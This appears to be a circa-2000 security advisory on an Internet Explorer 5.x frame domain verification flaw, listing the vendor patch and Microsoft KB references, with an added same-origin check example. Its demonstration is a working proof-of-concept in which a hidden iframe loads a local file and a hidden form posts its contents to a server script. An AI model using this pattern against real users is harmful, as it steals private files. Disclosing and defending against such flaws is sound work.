IE Frame Domain Verification Reported May 19 by Andrew Nosenko
VERSIONS AFFECTED
Internet Explorer 5.x
DESCRIPTION
When a web server opens a frame within a window, the IE security model should only
allow the parent window to access the data in the frame if they are in the same domain.
However, two functions available in IE do not properly perform domain checking, with the
result that the parent window could open a frame that contains a file on the local
computer, then read it. This could allow a malicious web site operator to view files on
the computer of a visiting user. The web site operator would need to know (or guess) the
name and location of the file, and could only view file types that can be opened in a
browser window.
DEMONSTRATION
<iframe id=clientContent width=0 height=0 noborder>
</iframe>
<script for=clientContent event="DocumentComplete(browser)">
    // browser is an instance of the IWebBrowser COM object
    alert (browser.document.body.innerText);
    document.forms[0].elements[0].value = browser.document.body.innerText;
    document.forms[0].submit ();
</script>
<script>
    clientContent.navigate("c:\\some_file.txt")
</script>
<form action="/cgi/malicious.cgi" method=post
      onSubmit="window.alert(document.forms[0].elements[0].value); return true">
    <input name="file_text" type=hidden>
</form>
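The check that the two IE functions described above fail to apply is an origin comparison between the parent document and the framed document. The following is an added example (not code from the advisory or from Microsoft) of that gate: `originOf`, `sameOrigin`, `readFrameText` and the constructed `frame` object are assumptions standing in for the browser's internal objects, and a `file:` URL is treated as an opaque origin that never matches a web origin.

```javascript
// Added example: the same-origin check a browser must apply before a parent
// window may read a frame's DOM (scheme, host and port must all match).
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Returns an origin string, or null for schemes whose origin is opaque
// (file:, about:, ...), which must never compare equal to a web origin.
function originOf(urlString) {
  const url = new URL(urlString);
  if (!(url.protocol in DEFAULT_PORTS)) return null;
  const port = url.port || DEFAULT_PORTS[url.protocol];
  return `${url.protocol}//${url.hostname.toLowerCase()}:${port}`;
}

function sameOrigin(parentUrl, frameUrl) {
  const a = originOf(parentUrl);
  const b = originOf(frameUrl);
  return a !== null && a === b;
}

// Simulated frame access: `frame` is a constructed stand-in for the
// browser object the demo above reads from. The text is released only
// when the origin check passes; otherwise access is refused.
function readFrameText(parentUrl, frame) {
  if (!sameOrigin(parentUrl, frame.url)) {
    throw new Error(`access denied: ${parentUrl} may not read ${frame.url}`);
  }
  return frame.bodyText;
}

// Constructed sample: a remote page framing a local file, as in the demo.
const localFrame = { url: "file:///c:/some_file.txt", bodyText: "local data" };
try {
  readFrameText("http://remote.example/page.html", localFrame);
} catch (e) {
  console.log(e.message); // the cross-origin read is refused
}
```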
VENDOR RESPONSE
Microsoft has issued a patch for the problem.
The patches require IE 4.01 Service Pack 2 or IE 5.01 to install. Customers using versions prior to these may receive a message reading "This update does not need to be installed on this system". This message is incorrect. More information is available in KB article Q262509.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-033, http://www.microsoft.com/technet/security/bulletin/fq00-033.asp
- Microsoft Knowledge Base article Q262509 discusses the overall patch
- Microsoft Knowledge Base articles Q251108 and Q255676 discuss the "Frame Domain Verification" vulnerability
- Microsoft Knowledge Base article Q258430 discusses the "Unauthorized Cookie Access" vulnerability
- Microsoft Knowledge Base article Q261257 discusses the "Malformed Component Attribute" vulnerability
- Microsoft Knowledge Base article Q247333, Web Proxy Auto-Discovery "Spoofing" May Change Proxy Settings, http://www.microsoft.com/technet/support/kb.asp?ID=247333
- Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
CREDITS
Discovered and reported by Andrew Nosenko